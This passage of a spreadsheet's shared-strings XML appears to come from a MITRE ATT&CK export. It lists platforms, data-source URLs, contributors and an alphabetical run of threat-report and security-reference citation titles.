    <t>Cloud Control Plane, Container, Host</t>
  </si>
  <si>
    <t>Containers, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>20 October 2021</t>
  </si>
  <si>
    <t>datasource</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0026</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0015</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0037</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0025</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0010</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0017</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0032</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0038</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0016</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0022</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0018</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0036</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0007</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0030</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0035</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0028</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0011</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0023</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0033</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0029</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0021</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0014</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0009</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0012</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0019</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0020</t>
  </si>
  <si>
    <t>https://attack.mitre.org/data-sources/DS0002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0034</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0005</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/datasources/DS0024</t>
  </si>
  <si>
    <t>Austin Clark, @c2defense; Center for Threat-Informed Defense (CTID)</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); ExtraHop</t>
  </si>
  <si>
    <t>reference</t>
  </si>
  <si>
    <t>citation</t>
  </si>
  <si>
    <t>00sec Droppers</t>
  </si>
  <si>
    <t>20 macOS Common Tools and Techniques</t>
  </si>
  <si>
    <t>360 Machete Sep 2020</t>
  </si>
  <si>
    <t>401 TRG Winnti Umbrella May 2018</t>
  </si>
  <si>
    <t>7zip Homepage</t>
  </si>
  <si>
    <t>AADInternals - BPRT</t>
  </si>
  <si>
    <t>AADInternals - Conditional Access Bypass</t>
  </si>
  <si>
    <t>AADInternals - Device Registration</t>
  </si>
  <si>
    <t>AADInternals Azure AD On-Prem to Cloud</t>
  </si>
  <si>
    <t>AADInternals Documentation</t>
  </si>
  <si>
    <t>AADInternals Github</t>
  </si>
  <si>
    <t>AADInternals zure AD Federated Domain</t>
  </si>
  <si>
    <t>ACSC Email Spoofing</t>
  </si>
  <si>
    <t>ADDSecurity DCShadow Feb 2018</t>
  </si>
  <si>
    <t>ADSecurity AD Kerberos Attacks</t>
  </si>
  <si>
    <t>ADSecurity Detecting Forged Tickets</t>
  </si>
  <si>
    <t>ADSecurity Finding Passwords in SYSVOL</t>
  </si>
  <si>
    <t>ADSecurity GPO Persistence 2016</t>
  </si>
  <si>
    <t>ADSecurity Kerberos Ring Decoder</t>
  </si>
  <si>
    <t>ADSecurity Kerberos and KRBTGT</t>
  </si>
  <si>
    <t>ADSecurity Mimikatz DCSync</t>
  </si>
  <si>
    <t>ADSecurity Silver Tickets</t>
  </si>
  <si>
    <t>ADSecurity Windows Secure Baseline</t>
  </si>
  <si>
    <t>AMD Magic Packet</t>
  </si>
  <si>
    <t>ANSSI Nobelium Phishing December 2021</t>
  </si>
  <si>
    <t>ANSSI RYUK RANSOMWARE</t>
  </si>
  <si>
    <t>ANSSI Sandworm January 2021</t>
  </si>
  <si>
    <t>APT15 Intezer June 2018</t>
  </si>
  <si>
    <t>APT3 Adversary Emulation Plan</t>
  </si>
  <si>
    <t>APT34</t>
  </si>
  <si>
    <t>APT40</t>
  </si>
  <si>
    <t>ARS Technica China Hack SK April 2017</t>
  </si>
  <si>
    <t>ASEC Emotet 2017</t>
  </si>
  <si>
    <t>ASERT Donot March 2018</t>
  </si>
  <si>
    <t>ASERT InnaputRAT April 2018</t>
  </si>
  <si>
    <t>ASERT Seven Pointed Dagger Aug 2015</t>
  </si>
  <si>
    <t>ATT Lazarus TTP Evolution</t>
  </si>
  <si>
    <t>ATT QakBot April 2021</t>
  </si>
  <si>
    <t>ATT ScanBox</t>
  </si>
  <si>
    <t>ATT Sidewinder January 2021</t>
  </si>
  <si>
    <t>ATT TeamTNT Chimaera September 2020</t>
  </si>
  <si>
    <t>AWS - IAM Console Best Practices</t>
  </si>
  <si>
    <t>AWS Cloud Trail Backup API</t>
  </si>
  <si>
    <t>AWS CloudTrail Search</t>
  </si>
  <si>
    <t>AWS Console Sign-in Events</t>
  </si>
  <si>
    <t>AWS Create IAM User</t>
  </si>
  <si>
    <t>AWS Describe DB Instances</t>
  </si>
  <si>
    <t>AWS EBS Snapshot Sharing</t>
  </si>
  <si>
    <t>AWS Get Bucket ACL</t>
  </si>
  <si>
    <t>AWS Get Public Access Block</t>
  </si>
  <si>
    <t>AWS GetPasswordPolicy</t>
  </si>
  <si>
    <t>AWS Head Bucket</t>
  </si>
  <si>
    <t>AWS IAM Policies and Permissions</t>
  </si>
  <si>
    <t>AWS Identity Federation</t>
  </si>
  <si>
    <t>AWS Instance Identity Documents</t>
  </si>
  <si>
    <t>AWS Instance Metadata API</t>
  </si>
  <si>
    <t>AWS Lambda Redirector</t>
  </si>
  <si>
    <t>AWS List Roles</t>
  </si>
  <si>
    <t>AWS List Users</t>
  </si>
  <si>
    <t>AWS Logging IAM Calls</t>
  </si>
  <si>
    <t>AWS Root User</t>
  </si>
  <si>
    <t>AWS Sec Groups VPC</t>
  </si>
  <si>
    <t>AWS Temporary Security Credentials</t>
  </si>
  <si>
    <t>AWS Traffic Mirroring</t>
  </si>
  <si>
    <t>About UEFI</t>
  </si>
  <si>
    <t>Accenture Dragonfish Jan 2018</t>
  </si>
  <si>
    <t>Accenture Hogfish April 2018</t>
  </si>
  <si>
    <t>Accenture HyperStack October 2020</t>
  </si>
  <si>
    <t>Accenture Lyceum Targets November 2021</t>
  </si>
  <si>
    <t>Accenture MUDCARP March 2019</t>
  </si>
  <si>
    <t>Accenture SNAKEMACKEREL Nov 2018</t>
  </si>
  <si>
    <t>ActiveMalwareEnergy</t>
  </si>
  <si>
    <t>AdSecurity Cracking Kerberos Dec 2015</t>
  </si>
  <si>
    <t>AdSecurity DCSync Sept 2015</t>
  </si>
  <si>
    <t>AdSecurity Forging Trust Tickets</t>
  </si>
  <si>
    <t>AdSecurity Kerberos GT Aug 2015</t>
  </si>
  <si>
    <t>AdSecurity SID History Sept 2015</t>
  </si>
  <si>
    <t>Add List Remove Login Items Apple Script</t>
  </si>
  <si>
    <t>AddMonitor</t>
  </si>
  <si>
    <t>Adding Login Items</t>
  </si>
  <si>
    <t>Adlice Software IAT Hooks Oct 2014</t>
  </si>
  <si>
    <t>Adsecurity Mimikatz Guide</t>
  </si>
  <si>
    <t>Advanced_sec_audit_policy_settings</t>
  </si>
  <si>
    <t>Adventures of a Keystroke</t>
  </si>
  <si>
    <t>AhnLab Andariel Subgroup of Lazarus June 2018</t>
  </si>
  <si>
    <t>AhnLab Kimsuky Kabar Cobra Feb 2019</t>
  </si>
  <si>
    <t>Airbus Derusbi 2015</t>
  </si>
  <si>
    <t>Airbus Security Kovter Analysis</t>
  </si>
  <si>
    <t>Akamai DGA Mitigation</t>
  </si>
  <si>
    <t>AlKhaser Debug</t>
  </si>
  <si>
    <t>Aleks Weapons Nov 2015</t>
  </si>
  <si>
    <t>AlienVault Sykipot 2011</t>
  </si>
  <si>
    <t>Alienvault Sykipot DOD Smart Cards</t>
  </si>
  <si>
    <t>Alintanahin 2014</t>
  </si>
  <si>
    <t>Almond COR_PROFILER Apr 2019</t>
  </si>
  <si>
    <t>Alperovitch 2014</t>
  </si>
  <si>
    <t>Alperovitch Malware</t>
  </si>
  <si>
    <t>Amazon  AWS Temporary Security Credentials</t>
  </si>
  <si>
    <t>Amazon AMI</t>
  </si>
  <si>
    <t>Amazon AWS</t>
  </si>
  <si>
    <t>Amazon AWS IMDS V2</t>
  </si>
  <si>
    <t>Amazon AWS VPC Guide</t>
  </si>
  <si>
    <t>Amazon Describe Instance</t>
  </si>
  <si>
    <t>Amazon Describe Instances API</t>
  </si>
  <si>
    <t>Amazon IAM Groups</t>
  </si>
  <si>
    <t>Amazon S3</t>
  </si>
  <si>
    <t>Amazon S3 Security, 2019</t>
  </si>
  <si>
    <t>Amazon Snapshots</t>
  </si>
  <si>
    <t>Amazon VM</t>
  </si>
  <si>
    <t>Amnesty Intl. Ocean Lotus February 2021</t>
  </si>
  <si>
    <t>Amnesty OAuth Phishing Attacks, August 2019</t>
  </si>
  <si>
    <t>Amplia WCE</t>
  </si>
  <si>
    <t>Analyzing CS Dec 2020</t>
  </si>
  <si>
    <t>Anomali Evasive Maneuvers July 2015</t>
  </si>
  <si>
    <t>Anomali Linux Rabbit 2018</t>
  </si>
  <si>
    <t>Anomali MUSTANG PANDA October 2019</t>
  </si>
  <si>
    <t>Anomali Pirate Panda April 2020</t>
  </si>
  <si>
    <t>Anomali Rocke March 2019</t>
  </si>
  <si>
    <t>Anomali Static Kitten February 2021</t>
  </si>
  <si>
    <t>Anomali Template Injection MAR 2018</t>
  </si>
  <si>
    <t>AnonHBGary</t>
  </si>
  <si>
    <t>Anonymous Hackers Deface Russian Govt Site</t>
  </si>
  <si>
    <t>Antiquated Mac Malware</t>
  </si>
  <si>
    <t>Antiy CERT Ramsay April 2020</t>
  </si>
  <si>
    <t>AnyRun TimeBomb</t>
  </si>
  <si>
    <t>AppInit Registry</t>
  </si>
  <si>
    <t>AppInit Secure Boot</t>
  </si>
  <si>
    <t>Apple About Mac Scripting 2016</t>
  </si>
  <si>
    <t>Apple App Security Overview</t>
  </si>
  <si>
    <t>Apple AppleScript</t>
  </si>
  <si>
    <t>Apple Core Services</t>
  </si>
  <si>
    <t>Apple Culprit Access</t>
  </si>
  <si>
    <t>Apple Developer Configuration Profile</t>
  </si>
  <si>
    <t>Apple Developer Doco Archive Launchd</t>
  </si>
  <si>
    <t>Apple Developer Doco Archive Run-Path</t>
  </si>
  <si>
    <t>Apple Developer Doco Hardened Runtime</t>
  </si>
  <si>
    <t>Apple Disable SIP</t>
  </si>
  <si>
    <t>Apple Doco Archive Dynamic Libraries</t>
  </si>
  <si>
    <t>Apple Kernel Extension Deprecation</t>
  </si>
  <si>
    <t>Apple PAM</t>
  </si>
  <si>
    <t>Apple Remote Desktop Admin Guide 3.3</t>
  </si>
  <si>
    <t>Apple Support Hide a User Account</t>
  </si>
  <si>
    <t>Apple TN2459 Kernel Extensions</t>
  </si>
  <si>
    <t>Apple Unified Log Analysis Remote Login and Screen Sharing</t>
  </si>
  <si>
    <t>Apple ZShell</t>
  </si>
  <si>
    <t>AppleDocs AuthorizationExecuteWithPrivileges</t>
  </si>
  <si>
    <t>AppleDocs Launch Agent Daemons</t>
  </si>
  <si>
    <t>Application Bundle Manipulation Brandon Dalton</t>
  </si>
  <si>
    <t>Aqua Build Images on Hosts</t>
  </si>
  <si>
    <t>Aqua Kinsing April 2020</t>
  </si>
  <si>
    <t>Aqua Security Cloud Native Threat Report June 2021</t>
  </si>
  <si>
    <t>Aqua TeamTNT August 2020</t>
  </si>
  <si>
    <t>Aquino RARSTONE</t>
  </si>
  <si>
    <t>Arbor AnnualDoSreport Jan 2018</t>
  </si>
  <si>
    <t>Arbor Musical Chairs Feb 2018</t>
  </si>
  <si>
    <t>Arbor SSLDoS April 2012</t>
  </si>
  <si>
    <t>Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018</t>
  </si>
  <si>
    <t>Ars Technica GRU indictment Jul 2018</t>
  </si>
  <si>
    <t>Ars Technica Pwn2Own 2017 VM Escape</t>
  </si>
  <si>
    <t>ArsTechnica Great Firewall of China</t>
  </si>
  <si>
    <t>ArsTechnica Intel</t>
  </si>
  <si>
    <t>ArtOfMemoryForensics</t>
  </si>
  <si>
    <t>Arxiv Avaddon Feb 2021</t>
  </si>
  <si>
    <t>Atlas SEO</t>
  </si>
  <si>
    <t>Atlassian Confluence Logging</t>
  </si>
  <si>
    <t>Attackify Rundll32.exe Obscurity</t>
  </si>
  <si>
    <t>Attacking VNC Servers PentestLab</t>
  </si>
  <si>
    <t>Audit OSX</t>
  </si>
  <si>
    <t>Audit_Policy_Microsoft</t>
  </si>
  <si>
    <t>Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019</t>
  </si>
  <si>
    <t>Auth0 Access Tokens</t>
  </si>
  <si>
    <t>Auth0 Understanding Refresh Tokens</t>
  </si>
  <si>
    <t>Autoruns for Windows</t>
  </si>
  <si>
    <t>Avast CCleaner3 2018</t>
  </si>
  <si>
    <t>Avira Mustang Panda January 2020</t>
  </si>
  <si>
    <t>Awake Security Avaddon</t>
  </si>
  <si>
    <t>Awake Security C2 Cloud</t>
  </si>
  <si>
    <t>Awesome Executable Packing</t>
  </si>
  <si>
    <t>Azure - Monitor Logs</t>
  </si>
  <si>
    <t>Azure - Resource Manager API</t>
  </si>
  <si>
    <t>Azure - Stormspotter</t>
  </si>
  <si>
    <t>Azure AD Conditional Access Exclusions</t>
  </si>
  <si>
    <t>Azure AD Connect for Read Teamers</t>
  </si>
  <si>
    <t>Azure AD Federation Vulnerability</t>
  </si>
  <si>
    <t>Azure AD Graph API</t>
  </si>
  <si>
    <t>Azure AD Hybrid Identity</t>
  </si>
  <si>
    <t>Azure AD PTA Vulnerabilities</t>
  </si>
  <si>
    <t>Azure AD Recon</t>
  </si>
  <si>
    <t>Azure AD to AD</t>
  </si>
  <si>
    <t>Azure Active Directory Reconnaisance</t>
  </si>
  <si>
    <t>Azure Activity Logs</t>
  </si>
  <si>
    <t>Azure Blob Snapshots</t>
  </si>
  <si>
    <t>Azure Blob Storage</t>
  </si>
  <si>
    <t>Azure Products</t>
  </si>
  <si>
    <t>Azure Shared Access Signature</t>
  </si>
  <si>
    <t>Azure Update Virtual Machines</t>
  </si>
  <si>
    <t>Azure Virtual Network TAP</t>
  </si>
  <si>
    <t>BBC LAPSUS Apr 2022</t>
  </si>
  <si>
    <t>BH Linux Inject</t>
  </si>
  <si>
    <t>BH Manul Aug 2016</t>
  </si>
  <si>
    <t>BOHOPS Abusing the COM Registry</t>
  </si>
  <si>
    <t>BRI Kimsuky April 2019</t>
  </si>
  <si>
    <t>BSidesSLC 2020 - LNK Elastic</t>
  </si>
  <si>
    <t>Backdooring an AWS account</t>
  </si>
  <si>
    <t>Backtrace VDSO</t>
  </si>
  <si>
    <t>Baeldung LD_PRELOAD</t>
  </si>
  <si>
    <t>BaltimoreSun RobbinHood May 2019</t>
  </si>
  <si>
    <t>Banker Google Chrome Extension Steals Creds</t>
  </si>
  <si>
    <t>Baumgartner Golovkin Naikon 2015</t>
  </si>
  <si>
    <t>Baumgartner Naikon 2015</t>
  </si>
  <si>
    <t>Beechey 2010</t>
  </si>
  <si>
    <t>Beek Use of VHD Dec 2020</t>
  </si>
  <si>
    <t>Berkley Secure</t>
  </si>
  <si>
    <t>BiZone Lizar May 2021</t>
  </si>
  <si>
    <t>Bienstock, D. - Defending O365 - 2019</t>
  </si>
  <si>
    <t>Bishop Fox Sliver Framework August 2019</t>
  </si>
  <si>
    <t>BitDefender Chafer May 2020</t>
  </si>
  <si>
    <t>Bitdefender APT28 Dec 2015</t>
  </si>
  <si>
    <t>Bitdefender Agent Tesla April 2020</t>
  </si>
  <si>
    <t>Bitdefender FIN8 July 2021</t>
  </si>
  <si>
    <t>Bitdefender FunnyDream Campaign November 2020</t>
  </si>
  <si>
    <t>Bitdefender Naikon April 2021</t>
  </si>
  <si>
    <t>Bitdefender StrongPity June 2020</t>
  </si>
  <si>
    <t>Bitdefender Trickbot C2 infra Nov 2020</t>
  </si>
  <si>
    <t>Bitdefender Trickbot March 2020</t>
  </si>
  <si>
    <t>Bitdefender Trickbot VNC module Whitepaper 2021</t>
  </si>
  <si>
    <t>Bizeul 2014</t>
  </si>
  <si>
    <t>Black Hat 2015 App Shim</t>
  </si>
  <si>
    <t>Black Hills Attacking Exchange MailSniper, 2016</t>
  </si>
  <si>
    <t>Black Hills Red Teaming MS AD Azure, 2018</t>
  </si>
  <si>
    <t>BlackBerry Amadey 2020</t>
  </si>
  <si>
    <t>BlackBerry Bahamut</t>
  </si>
  <si>
    <t>BlackBerry CostaRicto November 2020</t>
  </si>
  <si>
    <t>BlackHat API Packers</t>
  </si>
  <si>
    <t>BlackHat Atkinson Winchester Token Manipulation</t>
  </si>
  <si>
    <t>BlackHat Mac OSX Rootkit</t>
  </si>
  <si>
    <t>BlackHat Process Doppelgänging Dec 2017</t>
  </si>
  <si>
    <t>BlackHatRobinSage</t>
  </si>
  <si>
    <t>BlackHillsInfosec Password Spraying</t>
  </si>
  <si>
    <t>BlackWater Malware Cloudflare Workers</t>
  </si>
  <si>
    <t>Blasco 2013</t>
  </si>
  <si>
    <t>Bleeping Computer - Ryuk WoL</t>
  </si>
  <si>
    <t>Bleeping Computer Op Sharpshooter March 2019</t>
  </si>
  <si>
    <t>BleepingComp Godlua JUL19</t>
  </si>
  <si>
    <t>BleepingComputer DDE Disabled in Word Dec 2017</t>
  </si>
  <si>
    <t>BleepingComputer Ebury March 2017</t>
  </si>
  <si>
    <t>BleepingComputer Molerats Dec 2020</t>
  </si>
  <si>
    <t>BleepingComputer REvil 2021</t>
  </si>
  <si>
    <t>Bleepingcomputer Gamardeon FSB November 2021</t>
  </si>
  <si>
    <t>Bleepingcomputer RAT malware 2020</t>
  </si>
  <si>
    <t>Bloxham</t>
  </si>
  <si>
    <t>Blue Cloud of Death</t>
  </si>
  <si>
    <t>Blue Cloud of Death Video</t>
  </si>
  <si>
    <t>Botnet Scan</t>
  </si>
  <si>
    <t>Breach Post-mortem SSH Hijack</t>
  </si>
  <si>
    <t>Brining MimiKatz to Unix</t>
  </si>
  <si>
    <t>Bromium Ursnif Mar 2017</t>
  </si>
  <si>
    <t>Brown Exploiting Linkers</t>
  </si>
  <si>
    <t>CERN Windigo June 2019</t>
  </si>
  <si>
    <t>CERT-EE Gamaredon January 2021</t>
  </si>
  <si>
    <t>CERT-EU DDoS March 2017</t>
  </si>
  <si>
    <t>CERT-EU Golden Ticket Protection</t>
  </si>
  <si>
    <t>CERT-FR PYSA April 2020</t>
  </si>
  <si>
    <t>CG 2014</t>
  </si>
  <si>
    <t>CIRCL PlugX March 2013</t>
  </si>
  <si>
    <t>CIS Emotet Apr 2017</t>
  </si>
  <si>
    <t>CIS Emotet Dec 2018</t>
  </si>
  <si>
    <t>CIS Multiple SMB Vulnerabilities</t>
  </si>
  <si>
    <t>CISA AA20-239A BeagleBoyz August 2020</t>
  </si>
  <si>
    <t>CISA AA20-259A Iran-Based Actor September 2020</t>
  </si>
  <si>
    <t>CISA AA20-296A Berserk Bear December 2020</t>
  </si>
  <si>
    <t>CISA AA20-301A Kimsuky</t>
  </si>
  <si>
    <t>CISA AA21-200A APT40 July 2021</t>
  </si>
  <si>
    <t>CISA AA22-057A Destructive Malware February 2022</t>
  </si>
  <si>
    <t>CISA AR18-352A Quasar RAT December 2018</t>
  </si>
  <si>
    <t>CISA AR21-126A FIVEHANDS May 2021</t>
  </si>
  <si>
    <t>CISA AppleJeus Feb 2021</t>
  </si>
  <si>
    <t>CISA ComRAT Oct 2020</t>
  </si>
  <si>
    <t>CISA EB Aug 2020</t>
  </si>
  <si>
    <t>CISA ICS Advisory ICSA-10-272-01</t>
  </si>
  <si>
    <t>CISA IDN ST05-016</t>
  </si>
  <si>
    <t>CISA IT Service Providers</t>
  </si>
  <si>
    <t>CISA Lokibot September 2020</t>
  </si>
  <si>
    <t>CISA MAR SLOTHFULMEDIA October 2020</t>
  </si>
  <si>
    <t>CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020</t>
  </si>
  <si>
    <t>CISA MAR-10292089-1.v2 TAIDOOR August 2021</t>
  </si>
  <si>
    <t>CISA MFA PrintNightmare</t>
  </si>
  <si>
    <t>CISA MSS Sep 2020</t>
  </si>
  <si>
    <t>CISA SolarWinds Cloud Detection</t>
  </si>
  <si>
    <t>CISA SoreFang July 2016</t>
  </si>
  <si>
    <t>CISA Supernova Jan 2021</t>
  </si>
  <si>
    <t>CISA WellMail July 2020</t>
  </si>
  <si>
    <t>CISA WellMess July 2020</t>
  </si>
  <si>
    <t>CISA Zebrocy Oct 2020</t>
  </si>
  <si>
    <t>CME Github September 2018</t>
  </si>
  <si>
    <t>CNET Leaks</t>
  </si>
  <si>
    <t>CSM Elderwood Sept 2012</t>
  </si>
  <si>
    <t xml:space="preserve">CSV Excel Macro Injection </t>
  </si>
  <si>
    <t>CTD PPID Spoofing Macro Mar 2019</t>
  </si>
  <si>
    <t>CTU BITS Malware June 2016</t>
  </si>
  <si>
    <t>CVMServer Vuln</t>
  </si>
  <si>
    <t>CWE top 25</t>
  </si>
  <si>
    <t>CYBERCOM Iranian Intel Cyber January 2022</t>
  </si>
  <si>
    <t>Cado Security Denonia</t>
  </si>
  <si>
    <t>Cado Security TeamTNT Worm August 2020</t>
  </si>
  <si>
    <t>Camba RARSTONE</t>
  </si>
  <si>
    <t>CameraShy</t>
  </si>
  <si>
    <t>Campbell 2014</t>
  </si>
  <si>
    <t>Carbon Black Emotet Apr 2019</t>
  </si>
  <si>
    <t>Carbon Black HotCroissant April 2020</t>
  </si>
  <si>
    <t>Carbon Black JCry May 2019</t>
  </si>
  <si>
    <t>Carbon Black Obfuscation Sept 2016</t>
  </si>
  <si>
    <t>Carbon Black Shlayer Feb 2019</t>
  </si>
  <si>
    <t>Carbon Black Squiblydoo Apr 2016</t>
  </si>
  <si>
    <t>CarbonBlack Conti July 2020</t>
  </si>
  <si>
    <t>CarbonBlack LockerGoga 2019</t>
  </si>
  <si>
    <t>CarbonBlack RobbinHood May 2019</t>
  </si>
  <si>
    <t>Carnal Ownage Password Filters Sept 2013</t>
  </si>
  <si>
    <t>Carnegie Mellon University Supernova Dec 2020</t>
  </si>
  <si>
    <t>Cary Esentutl</t>
  </si>
  <si>
    <t>Catch All Chrome Extension</t>
  </si>
  <si>
    <t>Categorisation_not_boundary</t>
  </si>
  <si>
    <t>Certfa Charming Kitten January 2021</t>
  </si>
  <si>
    <t>Chafer</t>
  </si>
  <si>
    <t>Chaos Stolen Backdoor</t>
  </si>
  <si>
    <t>Check Point APT31 February 2021</t>
  </si>
  <si>
    <t>Check Point APT34 April 2021</t>
  </si>
  <si>
    <t>Check Point APT35 CharmPower January 2022</t>
  </si>
  <si>
    <t>Check Point Havij Analysis</t>
  </si>
  <si>
    <t>Check Point Meteor Aug 2021</t>
  </si>
  <si>
    <t>Check Point Pay2Key November 2020</t>
  </si>
  <si>
    <t>Check Point Rocket Kitten</t>
  </si>
  <si>
    <t>Check Point Sunburst Teardrop December 2020</t>
  </si>
  <si>
    <t>Check Point Warzone Feb 2020</t>
  </si>
  <si>
    <t>CheckPoint Bandook Nov 2020</t>
  </si>
  <si>
    <t>CheckPoint Dok</t>
  </si>
  <si>
    <t>CheckPoint Naikon May 2020</t>
  </si>
  <si>
    <t>CheckPoint Redaman October 2019</t>
  </si>
  <si>
    <t>CheckPoint SpeakUp Feb 2019</t>
  </si>
  <si>
    <t>CheckPoint Volatile Cedar March 2015</t>
  </si>
  <si>
    <t>Checkpoint Dridex Jan 2021</t>
  </si>
  <si>
    <t>Checkpoint IndigoZebra July 2021</t>
  </si>
  <si>
    <t>Checkpoint MosesStaff Nov 2021</t>
  </si>
  <si>
    <t>Chkrootkit Main</t>
  </si>
  <si>
    <t>Chokepoint preload rootkits</t>
  </si>
  <si>
    <t>Chrome Extension C2 Malware</t>
  </si>
  <si>
    <t>Chrome Extension Crypto Miner</t>
  </si>
  <si>
    <t>Chrome Extensions Definition</t>
  </si>
  <si>
    <t>Chronicle Winnti for Linux May 2019</t>
  </si>
  <si>
    <t>Ciberseguridad Decoding malicious RTF files</t>
  </si>
  <si>
    <t>Circl Passive DNS</t>
  </si>
  <si>
    <t>Cisco ARP Poisoning Mitigation 2016</t>
  </si>
  <si>
    <t>Cisco Advisory SNMP v3 Authentication Vulnerabilities</t>
  </si>
  <si>
    <t>Cisco Blog Legacy Device Attacks</t>
  </si>
  <si>
    <t>Cisco CaddyWiper March 2022</t>
  </si>
  <si>
    <t>Cisco DNSMessenger March 2017</t>
  </si>
  <si>
    <t>Cisco DoSdetectNetflow</t>
  </si>
  <si>
    <t>Cisco Group 72</t>
  </si>
  <si>
    <t>Cisco H1N1 Part 1</t>
  </si>
  <si>
    <t>Cisco H1N1 Part 2</t>
  </si>
  <si>
    <t>Cisco IOS Forensics Developments</t>
  </si>
  <si>
    <t>Cisco IOS Shellcode</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - AAA</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Boot Information</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Change Control</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Command History</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Credentials Management</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Deploy Signed IOS</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Image File Integrity</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Image File Verification</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Run-Time Memory Verification</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - Secure Boot</t>
  </si>
  <si>
    <t>Cisco IOS Software Integrity Assurance - TACACS</t>
  </si>
  <si>
    <t>Cisco Securing SNMP</t>
  </si>
  <si>
    <t>Cisco Synful Knock Evolution</t>
  </si>
  <si>
    <t>Cisco Talos Bitter Bangladesh May 2022</t>
  </si>
  <si>
    <t>Cisco Talos Intelligence Group</t>
  </si>
  <si>
    <t>Cisco Talos Transparent Tribe Education Campaign July 2022</t>
  </si>
  <si>
    <t>Cisco Traffic Mirroring</t>
  </si>
  <si>
    <t>Cisco Ukraine Wipers January 2022</t>
  </si>
  <si>
    <t>Cisco Umbrella DGA</t>
  </si>
  <si>
    <t>Cisco Umbrella DGA Brute Force</t>
  </si>
  <si>
    <t>CiscoAngler</t>
  </si>
  <si>
    <t>Citizen Lab Group5</t>
  </si>
  <si>
    <t>Citizen Lab Stealth Falcon May 2016</t>
  </si>
  <si>
    <t>CitizenLab KeyBoy Nov 2016</t>
  </si>
  <si>
    <t>CitizenLab Tropic Trooper Aug 2018</t>
  </si>
  <si>
    <t>Citizenlab Packrat 2015</t>
  </si>
  <si>
    <t>Ciubotariu 2014</t>
  </si>
  <si>
    <t>ClearSky Charming Kitten Dec 2017</t>
  </si>
  <si>
    <t>ClearSky CopyKittens March 2017</t>
  </si>
  <si>
    <t>ClearSky Kittens Back 2 Oct 2019</t>
  </si>
  <si>
    <t>ClearSky Kittens Back 3 August 2020</t>
  </si>
  <si>
    <t>ClearSky Lazarus Aug 2020</t>
  </si>
  <si>
    <t>ClearSky Lebanese Cedar Jan 2021</t>
  </si>
  <si>
    <t>ClearSky MuddyWater June 2019</t>
  </si>
  <si>
    <t>ClearSky MuddyWater Nov 2018</t>
  </si>
  <si>
    <t>ClearSky OilRig Jan 2017</t>
  </si>
  <si>
    <t>ClearSky Pay2Kitten December 2020</t>
  </si>
  <si>
    <t>ClearSky Siamesekitten August 2021</t>
  </si>
  <si>
    <t>ClearSky Wilted Tulip July 2017</t>
  </si>
  <si>
    <t>ClearSky and Trend Micro Operation Wilted Tulip July 2017</t>
  </si>
  <si>
    <t>ClearkSky Fox Kitten February 2020</t>
  </si>
  <si>
    <t>Clockwork SSH Agent Hijacking</t>
  </si>
  <si>
    <t>Cloud Audit Logs</t>
  </si>
  <si>
    <t>CloudSploit - Unused AWS Regions</t>
  </si>
  <si>
    <t>Cloudflare DNSamplficationDoS</t>
  </si>
  <si>
    <t>Cloudflare HTTPflood</t>
  </si>
  <si>
    <t>Cloudflare Memcrashed Feb 2018</t>
  </si>
  <si>
    <t>Cloudflare NTPamplifciationDoS</t>
  </si>
  <si>
    <t>Cloudflare ReflectionDoS May 2017</t>
  </si>
  <si>
    <t>Cloudflare SynFlood</t>
